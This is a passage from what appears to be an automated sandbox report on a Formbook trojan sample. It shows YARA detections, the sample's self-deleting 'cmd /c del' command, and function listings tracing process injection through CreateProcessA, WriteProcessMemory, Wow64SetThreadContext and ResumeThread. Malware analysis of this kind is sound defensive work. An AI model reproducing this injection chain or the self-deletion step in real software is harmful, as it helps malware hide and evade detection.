                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2498297879.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:5
                                    Start time:08:38:22
                                    Start date:07/09/2023
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del "C:\Users\user\Desktop\2FcJgghyXg.exe"
                                    Imagebase:0x120000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:08:38:22
                                    Start date:07/09/2023
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff78b990000
                                    File size:873'472 bytes
                                    MD5 hash:86191D9E0E30631DB3E78E4645804358
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:11.2%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:180
                                      Total number of Limit Nodes:18
                                      execution_graph 22443 105d000 22444 105d046 22443->22444 22448 105d5d8 22444->22448 22451 105d5e8 22444->22451 22445 105d133 22454 105d23c 22448->22454 22452 105d616 22451->22452 22453 105d23c DuplicateHandle 22451->22453 22452->22445 22453->22452 22455 105d650 DuplicateHandle 22454->22455 22456 105d616 22455->22456 22456->22445 22657 105ac70 22660 105ad68 22657->22660 22658 105ac7f 22661 105ad79 22660->22661 22662 105ad9c 22660->22662 22661->22662 22668 105aff0 22661->22668 22672 105b000 22661->22672 22662->22658 22663 105ad94 22663->22662 22664 105afa0 GetModuleHandleW 22663->22664 22665 105afcd 22664->22665 22665->22658 22669 105b000 22668->22669 22671 105b039 22669->22671 22676 105a0f0 22669->22676 22671->22663 22673 105b014 22672->22673 22674 105b039 22673->22674 22675 105a0f0 LoadLibraryExW 22673->22675 22674->22663 22675->22674 22677 105b1e0 LoadLibraryExW 22676->22677 22679 105b259 22677->22679 22679->22671 22457 8504e18 22458 8504fa3 22457->22458 22460 8504e3e 22457->22460 22460->22458 22461 8502548 22460->22461 22462 85054a0 PostMessageW 22461->22462 22463 850550c 22462->22463 22463->22460 22464 8504338 22465 8504317 22464->22465 22466 85043c7 22465->22466 22469 8504598 22465->22469 22482 8504588 22465->22482 22471 85045b3 22469->22471 22470 85045a8 22470->22466 22471->22470 22495 8504ced 22471->22495 22505 8504bfa 22471->22505 22514 8504b68 22471->22514 22523 8504828 22471->22523 22534 85049b6 22471->22534 22541 8504ca4 22471->22541 22553 85049f3 22471->22553 22566 8504810 22471->22566 22577 85048bf 22471->22577 22472 85046af 22472->22466 22483 85045a8 22482->22483 22484 85045b3 22482->22484 22483->22466 22484->22483 22486 8504810 6 API calls 22484->22486 22487 85049f3 6 API calls 22484->22487 22488 8504ca4 6 API calls 22484->22488 22489 85049b6 4 API calls 22484->22489 22490 8504828 6 API calls 22484->22490 22491 8504b68 4 API calls 22484->22491 22492 8504bfa 6 API calls 22484->22492 22493 8504ced 4 API calls 22484->22493 22494 85048bf 6 API calls 22484->22494 22485 85046af 22485->22466 22486->22485 22487->22485 22488->22485 22489->22485 22490->22485 22491->22485 22492->22485 22493->22485 22494->22485 22496 8504cf0 22495->22496 22497 8504963 22496->22497 22502 8503b08 Wow64SetThreadContext 22496->22502 22600 8503b10 22496->22600 22498 8504ca2 22497->22498 22499 8503b10 Wow64SetThreadContext 22497->22499 22588 8503ca0 22497->22588 22592 8503ca8 22497->22592 22596 8503b08 22497->22596 22498->22472 22499->22497 22502->22497 22604 8503d91 22505->22604 22608 8503d98 22505->22608 22506 8504c50 22506->22472 22507 8504963 22507->22506 22510 8503b10 Wow64SetThreadContext 22507->22510 22511 8503b08 Wow64SetThreadContext 22507->22511 22512 8503ca0 WriteProcessMemory 22507->22512 22513 8503ca8 WriteProcessMemory 22507->22513 22510->22507 22511->22507 22512->22507 22513->22507 22517 8503ca0 WriteProcessMemory 22514->22517 22518 8503ca8 WriteProcessMemory 22514->22518 22515 8504ca2 22515->22472 22516 8504963 22516->22515 22519 8503b10 Wow64SetThreadContext 22516->22519 22520 8503b08 Wow64SetThreadContext 22516->22520 22521 8503ca0 WriteProcessMemory 22516->22521 22522 8503ca8 WriteProcessMemory 22516->22522 22517->22516 22518->22516 22519->22516 22520->22516 22521->22516 22522->22516 22525 8504855 22523->22525 22524 85048c4 22524->22472 22525->22524 22612 8503f30 22525->22612 22616 8503f25 22525->22616 22535 8504963 22534->22535 22536 8504ca2 22535->22536 22537 8503b10 Wow64SetThreadContext 22535->22537 22538 8503b08 Wow64SetThreadContext 22535->22538 22539 8503ca0 WriteProcessMemory 22535->22539 22540 8503ca8 WriteProcessMemory 22535->22540 22536->22472 22537->22535 22538->22535 22539->22535 22540->22535 22620 8503be8 22541->22620 22624 8503be0 22541->22624 22542 8504cc3 22543 8504963 22542->22543 22545 8503ca0 WriteProcessMemory 22542->22545 22546 8503ca8 WriteProcessMemory 22542->22546 22544 8504ca2 22543->22544 22547 8503b10 Wow64SetThreadContext 22543->22547 22548 8503b08 Wow64SetThreadContext 22543->22548 22551 8503ca0 WriteProcessMemory 22543->22551 22552 8503ca8 WriteProcessMemory 22543->22552 22544->22472 22545->22542 22546->22542 22547->22543 22548->22543 22551->22543 22552->22543 22554 85049f6 22553->22554 22558 8503b10 Wow64SetThreadContext 22554->22558 22559 8503b08 Wow64SetThreadContext 22554->22559 22555 8504a06 22557 8504963 22555->22557 22628 8503a58 22555->22628 22632 8503a60 22555->22632 22556 85048c4 22556->22472 22557->22556 22560 8503ca0 WriteProcessMemory 22557->22560 22561 8503ca8 WriteProcessMemory 22557->22561 22564 8503b10 Wow64SetThreadContext 22557->22564 22565 8503b08 Wow64SetThreadContext 22557->22565 22558->22555 22559->22555 22560->22557 22561->22557 22564->22557 22565->22557 22568 8504855 22566->22568 22567 85048c4 22567->22472 22568->22567 22573 8503f30 CreateProcessA 22568->22573 22574 8503f25 CreateProcessA 22568->22574 22569 8504ca2 22569->22472 22570 850490a 22570->22569 22571 8503ca0 WriteProcessMemory 22570->22571 22572 8503ca8 WriteProcessMemory 22570->22572 22575 8503b10 Wow64SetThreadContext 22570->22575 22576 8503b08 Wow64SetThreadContext 22570->22576 22571->22570 22572->22570 22573->22570 22574->22570 22575->22570 22576->22570 22578 85048c4 22577->22578 22579 8504855 22577->22579 22578->22472 22579->22578 22584 8503f30 CreateProcessA 22579->22584 22585 8503f25 CreateProcessA 22579->22585 22580 8504ca2 22580->22472 22581 850490a 22581->22580 22582 8503ca0 WriteProcessMemory 22581->22582 22583 8503ca8 WriteProcessMemory 22581->22583 22586 8503b10 Wow64SetThreadContext 22581->22586 22587 8503b08 Wow64SetThreadContext 22581->22587 22582->22581 22583->22581 22584->22581 22585->22581 22586->22581 22587->22581 22589 8503ca6 WriteProcessMemory 22588->22589 22591 8503d47 22589->22591 22591->22497 22593 8503cf0 WriteProcessMemory 22592->22593 22595 8503d47 22593->22595 22595->22497 22597 8503b55 Wow64SetThreadContext 22596->22597 22599 8503b9d 22597->22599 22599->22497 22601 8503b55 Wow64SetThreadContext 22600->22601 22603 8503b9d 22601->22603 22603->22497 22605 8503de3 ReadProcessMemory 22604->22605 22607 8503e27 22605->22607 22607->22507 22609 8503de3 ReadProcessMemory 22608->22609 22611 8503e27 22609->22611 22611->22507 22613 8503fb9 CreateProcessA 22612->22613 22615 850417b 22613->22615 22617 8503fb9 CreateProcessA 22616->22617 22619 850417b 22617->22619 22621 8503c28 VirtualAllocEx 22620->22621 22623 8503c65 22621->22623 22623->22542 22625 8503c28 VirtualAllocEx 22624->22625 22627 8503c65 22625->22627 22627->22542 22629 8503aa0 ResumeThread 22628->22629 22631 8503ad1 22629->22631 22631->22557 22633 8503aa0 ResumeThread 22632->22633 22635 8503ad1 22633->22635 22635->22557 22636 1054668 22637 105467a 22636->22637 22638 1054686 22637->22638 22640 1054778 22637->22640 22641 105479d 22640->22641 22645 1054878 22641->22645 22649 1054888 22641->22649 22646 10548af 22645->22646 22647 105498c 22646->22647 22653 10544b0 22646->22653 22651 10548af 22649->22651 22650 105498c 22650->22650 22651->22650 22652 10544b0 CreateActCtxA 22651->22652 22652->22650 22654 1055918 CreateActCtxA 22653->22654 22656 10559db 22654->22656

                                      Executed Functions

                                      Function 08506158 Relevance: .3, Instructions: 345COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 096c43fc127cf37009df0e5c3c85f0fc914ec012902d0c584d8c59eed18a8240
                                      • Instruction ID: a544322e8756d23293487166938a2b328c00330682fe24b97410f7eb166bb0e8
                                      • Opcode Fuzzy Hash: 096c43fc127cf37009df0e5c3c85f0fc914ec012902d0c584d8c59eed18a8240
                                      • Instruction Fuzzy Hash: 78C19771700B058FDB29DB69C460BAF7BEABF99602F14856DD5869B2D0DB34E802CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08503F25 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246processCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 294 8503f25-8503fc5 296 8503fc7-8503fd1 294->296 297 8503ffe-850401e 294->297 296->297 298 8503fd3-8503fd5 296->298 302 8504020-850402a 297->302 303 8504057-8504086 297->303 300 8503fd7-8503fe1 298->300 301 8503ff8-8503ffb 298->301 304 8503fe3 300->304 305 8503fe5-8503ff4 300->305 301->297 302->303 306 850402c-850402e 302->306 313 8504088-8504092 303->313 314 85040bf-8504179 CreateProcessA 303->314 304->305 305->305 307 8503ff6 305->307 308 8504030-850403a 306->308 309 8504051-8504054 306->309 307->301 311 850403c 308->311 312 850403e-850404d 308->312 309->303 311->312 312->312 315 850404f 312->315 313->314 316 8504094-8504096 313->316 325 8504182-8504208 314->325 326 850417b-8504181 314->326 315->309 317 8504098-85040a2 316->317 318 85040b9-85040bc 316->318 320 85040a4 317->320 321 85040a6-85040b5 317->321 318->314 320->321 321->321 322 85040b7 321->322 322->318 336 8504218-850421c 325->336 337 850420a-850420e 325->337 326->325 339 850422c-8504230 336->339 340 850421e-8504222 336->340 337->336 338 8504210 337->338 338->336 342 8504240-8504244 339->342 343 8504232-8504236 339->343 340->339 341 8504224 340->341 341->339 345 8504256-850425d 342->345 346 8504246-850424c 342->346 343->342 344 8504238 343->344 344->342 347 8504274 345->347 348 850425f-850426e 345->348 346->345 350 8504275 347->350 348->347 350->350
                                      APIs
                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08504166
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID: >+0$>+0
                                      • API String ID: 963392458-2378181469
                                      • Opcode ID: 6bf4af955f69c298ce3c32ee2dfc99ce29b326319afee73a73f252b6ddd1f52c
                                      • Instruction ID: ec13dbfb896bea60622345284ecfee24ea5183166f7a23f776b39f05f03173e3
                                      • Opcode Fuzzy Hash: 6bf4af955f69c298ce3c32ee2dfc99ce29b326319afee73a73f252b6ddd1f52c
                                      • Instruction Fuzzy Hash: 5AA16C71D0025ACFDF24CF68C851BEEBBB2BF48305F1481A9E909A7280DB759985CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08503F30 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243processCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 351 8503f30-8503fc5 353 8503fc7-8503fd1 351->353 354 8503ffe-850401e 351->354 353->354 355 8503fd3-8503fd5 353->355 359 8504020-850402a 354->359 360 8504057-8504086 354->360 357 8503fd7-8503fe1 355->357 358 8503ff8-8503ffb 355->358 361 8503fe3 357->361 362 8503fe5-8503ff4 357->362 358->354 359->360 363 850402c-850402e 359->363 370 8504088-8504092 360->370 371 85040bf-8504179 CreateProcessA 360->371 361->362 362->362 364 8503ff6 362->364 365 8504030-850403a 363->365 366 8504051-8504054 363->366 364->358 368 850403c 365->368 369 850403e-850404d 365->369 366->360 368->369 369->369 372 850404f 369->372 370->371 373 8504094-8504096 370->373 382 8504182-8504208 371->382 383 850417b-8504181 371->383 372->366 374 8504098-85040a2 373->374 375 85040b9-85040bc 373->375 377 85040a4 374->377 378 85040a6-85040b5 374->378 375->371 377->378 378->378 379 85040b7 378->379 379->375 393 8504218-850421c 382->393 394 850420a-850420e 382->394 383->382 396 850422c-8504230 393->396 397 850421e-8504222 393->397 394->393 395 8504210 394->395 395->393 399 8504240-8504244 396->399 400 8504232-8504236 396->400 397->396 398 8504224 397->398 398->396 402 8504256-850425d 399->402 403 8504246-850424c 399->403 400->399 401 8504238 400->401 401->399 404 8504274 402->404 405 850425f-850426e 402->405 403->402 407 8504275 404->407 405->404 407->407
                                      APIs
                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08504166
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID: >+0$>+0
                                      • API String ID: 963392458-2378181469
                                      • Opcode ID: 88e68151aeb31bdee3f7379b9da5e899630620098f60c984b16c30a29c49ae20
                                      • Instruction ID: 5c451ee0d7a1609e1221f4ff855876072c7dfd31eff25cf635fdc03714c245d9
                                      • Opcode Fuzzy Hash: 88e68151aeb31bdee3f7379b9da5e899630620098f60c984b16c30a29c49ae20
                                      • Instruction Fuzzy Hash: 8F916B71D0021ACFDF24DFA8C851BDEBBB2BF48315F148169E909A7280DB759985CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0105AD68 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 199COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 466 105ad68-105ad77 467 105ada3-105ada7 466->467 468 105ad79-105ad86 call 105a08c 466->468 470 105ada9-105adb3 467->470 471 105adbb-105adfc 467->471 475 105ad9c 468->475 476 105ad88 468->476 470->471 477 105adfe-105ae06 471->477 478 105ae09-105ae17 471->478 475->467 521 105ad8e call 105aff0 476->521 522 105ad8e call 105b000 476->522 477->478 479 105ae19-105ae1e 478->479 480 105ae3b-105ae3d 478->480 482 105ae20-105ae27 call 105a098 479->482 483 105ae29 479->483 485 105ae40-105ae47 480->485 481 105ad94-105ad96 481->475 484 105aed8-105af98 481->484 489 105ae2b-105ae39 482->489 483->489 516 105afa0-105afcb GetModuleHandleW 484->516 517 105af9a-105af9d 484->517 486 105ae54-105ae5b 485->486 487 105ae49-105ae51 485->487 490 105ae5d-105ae65 486->490 491 105ae68-105ae71 call 105a0a8 486->491 487->486 489->485 490->491 497 105ae73-105ae7b 491->497 498 105ae7e-105ae83 491->498 497->498 499 105ae85-105ae8c 498->499 500 105aea1-105aea5 498->500 499->500 502 105ae8e-105ae9e call 105a0b8 call 105a0c8 499->502 503 105aeab-105aeae 500->503 502->500 506 105aed1-105aed7 503->506 507 105aeb0-105aece 503->507 507->506 518 105afd4-105afe8 516->518 519 105afcd-105afd3 516->519 517->516 519->518 521->481 522->481
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0105AFBE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID: >+0
                                      • API String ID: 4139908857-4245186874
                                      • Opcode ID: 23a133c7eb56c9c1f81941d1a0cce1d457ec532a481706910689f6d0741390a6
                                      • Instruction ID: 76e630631f7b2cd4625943d14104cd727e4c0ceb84d17546a7be433a3d33dc6a
                                      • Opcode Fuzzy Hash: 23a133c7eb56c9c1f81941d1a0cce1d457ec532a481706910689f6d0741390a6
                                      • Instruction Fuzzy Hash: 0A712470A00B05CFD7A4DF2AD45579BBBF1FF88304F008A2DD88A97A50D734E9498B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 010544B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 523 10544b0-10559d9 CreateActCtxA 527 10559e2-1055a3c 523->527 528 10559db-10559e1 523->528 535 1055a3e-1055a41 527->535 536 1055a4b-1055a4f 527->536 528->527 535->536 537 1055a51-1055a5d 536->537 538 1055a60 536->538 537->538 540 1055a61 538->540 540->540
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 010559C9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID: >+0
                                      • API String ID: 2289755597-4245186874
                                      • Opcode ID: 4eff367d545bde50adbb880e09b6adbd2926817c905445ca0ef7cdebc89dc785
                                      • Instruction ID: 83aeb571680b4f0831755feb1d4dcfada7717b2b03573c02107ff721c8e43e0a
                                      • Opcode Fuzzy Hash: 4eff367d545bde50adbb880e09b6adbd2926817c905445ca0ef7cdebc89dc785
                                      • Instruction Fuzzy Hash: DB41E0B0C0071DCBDB24DFAAC885B9EBBF5BF49304F60806AD809AB251DB756945CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0105590C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 541 105590c-105598c 543 105598f-10559d9 CreateActCtxA 541->543 545 10559e2-1055a3c 543->545 546 10559db-10559e1 543->546 553 1055a3e-1055a41 545->553 554 1055a4b-1055a4f 545->554 546->545 553->554 555 1055a51-1055a5d 554->555 556 1055a60 554->556 555->556 558 1055a61 556->558 558->558
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 010559C9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID: >+0
                                      • API String ID: 2289755597-4245186874
                                      • Opcode ID: 07114311a45f46f51459bf79cbbb5d3ffff6acaa45b8b9ab540a4dfd050cdd8b
                                      • Instruction ID: ee78d526ca1395e202dd699364a18ef10bb4ee2aa08aca414de3ae43215919ac
                                      • Opcode Fuzzy Hash: 07114311a45f46f51459bf79cbbb5d3ffff6acaa45b8b9ab540a4dfd050cdd8b
                                      • Instruction Fuzzy Hash: A141E0B0C00719CBDB24DFAAC884BDEBBF5BF48304F64806AD459AB251DB756946CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08503CA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81injectionCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 559 8503ca0-8503ca4 560 8503cd5-8503cf6 559->560 561 8503ca6-8503cd4 559->561 565 8503d06-8503d45 WriteProcessMemory 560->565 566 8503cf8-8503d04 560->566 561->560 568 8503d47-8503d4d 565->568 569 8503d4e-8503d7e 565->569 566->565 568->569
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08503D38
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID: >+0
                                      • API String ID: 3559483778-4245186874
                                      • Opcode ID: 195085a4ddd297a1aeded8d2ebbed6e7eb51ca345493017c3d91d4f065b2674d
                                      • Instruction ID: f1262fe9373db390fdd60cd2704f43a520faea7a51203e0d224e6556305b942b
                                      • Opcode Fuzzy Hash: 195085a4ddd297a1aeded8d2ebbed6e7eb51ca345493017c3d91d4f065b2674d
                                      • Instruction Fuzzy Hash: 9B3168759002499FCB10CFA9C885AEEBFF1FF48310F10892AE955A7391D7789945CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08503CA8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 573 8503ca8-8503cf6 575 8503d06-8503d45 WriteProcessMemory 573->575 576 8503cf8-8503d04 573->576 578 8503d47-8503d4d 575->578 579 8503d4e-8503d7e 575->579 576->575 578->579
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08503D38
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID: >+0
                                      • API String ID: 3559483778-4245186874
                                      • Opcode ID: 326a349b49635a2e27e3e6212cdcd36acd3f49e7060ae1170b982ea2fd73a018
                                      • Instruction ID: 93f97eb6141f5c94585632995bc62ed85cd270601e079e0b062832cebb1b834c
                                      • Opcode Fuzzy Hash: 326a349b49635a2e27e3e6212cdcd36acd3f49e7060ae1170b982ea2fd73a018
                                      • Instruction Fuzzy Hash: 992113729002499FCB10CFAAC985BDEBBF5FB48310F10882AE919A7340D7789954CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08503B08 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 583 8503b08-8503b5b 585 8503b6b-8503b9b Wow64SetThreadContext 583->585 586 8503b5d-8503b69 583->586 588 8503ba4-8503bd4 585->588 589 8503b9d-8503ba3 585->589 586->585 589->588
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08503B8E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID: >+0
                                      • API String ID: 983334009-4245186874
                                      • Opcode ID: 78781f2bf58b090495936803a1b6db6e6afcb079460b73cfe78553688b032965
                                      • Instruction ID: e0e0a00f6ff5204087b2139d3e2f211b46ee5839ee1af2f8ed8b583ab3c79e01
                                      • Opcode Fuzzy Hash: 78781f2bf58b090495936803a1b6db6e6afcb079460b73cfe78553688b032965
                                      • Instruction Fuzzy Hash: C42125719002498FDB10DFAAC485BEEBBF4EF88324F14842AD459A7381D7789945CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0105D23C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 593 105d23c-105d6e4 DuplicateHandle 595 105d6e6-105d6ec 593->595 596 105d6ed-105d70a 593->596 595->596
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0105D616,?,?,?,?,?), ref: 0105D6D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID: >+0
                                      • API String ID: 3793708945-4245186874
                                      • Opcode ID: d16cfa84792191049f12817d9b434930bdeaae13f7e54abec574cf0a3581610a
                                      • Instruction ID: 31ef1ffd0ae5d97fcca4bcac9cbdde1a04ddb3e4fab9d508542779ecb4828f12
                                      • Opcode Fuzzy Hash: d16cfa84792191049f12817d9b434930bdeaae13f7e54abec574cf0a3581610a
                                      • Instruction Fuzzy Hash: 2A21E5B5900248EFDB10CF9AD884AEEBBF8EB48310F14845AE959A7350D374A954CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08503D91 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 604 8503d91-8503e25 ReadProcessMemory 607 8503e27-8503e2d 604->607 608 8503e2e-8503e5e 604->608 607->608
                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08503E18
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8500000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID: >+0
                                      • API String ID: 1726664587-4245186874
                                      • Opcode ID: 704e5e65f226fff0127b9eb1d8c79cf688931c77faf0bbcc9879b88a8a8d10bb
                                      • Instruction ID: 7259f4446c01b4d0b9bd8e625f6ddbae52631c18b98e5f29906059be07783a3b
                                      • Opcode Fuzzy Hash: 704e5e65f226fff0127b9eb1d8c79cf688931c77faf0bbcc9879b88a8a8d10bb
                                      • Instruction Fuzzy Hash: 642145718002499FCB10CFAAC881AEEFBF5FF88320F14882AE518A7240C7789954CF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0105D648 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 599 105d648-105d6e4 DuplicateHandle 600 105d6e6-105d6ec 599->600 601 105d6ed-105d70a 599->601 600->601
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0105D616,?,?,?,?,?), ref: 0105D6D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1251971912.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1050000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID: >+0
                                      • API String ID: 3793708945-4245186874
                                      • Opcode ID: 50ec89814b8dcada72d8da52a7991e926d7309ce4d35828688f9ec347e9542da
                                      • Instruction ID: c4388bfafe25614024f3273d74f79573e86f9bd9e2e06621316a2e1135c17a77
                                      • Opcode Fuzzy Hash: 50ec89814b8dcada72d8da52a7991e926d7309ce4d35828688f9ec347e9542da
                                      • Instruction Fuzzy Hash: 5221E3B59002489FDB10CFAAD884ADEBFF5EB48310F14841AE958A7350D374A945CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 08503B10 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 612 8503b10-8503b5b 614 8503b6b-8503b9b Wow64SetThreadContext 612->614 615 8503b5d-8503b69 612->615 617 8503ba4-8503bd4 614->617 618 8503b9d-8503ba3 614->618 615->614 618->617
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08503B8E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1260542493.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
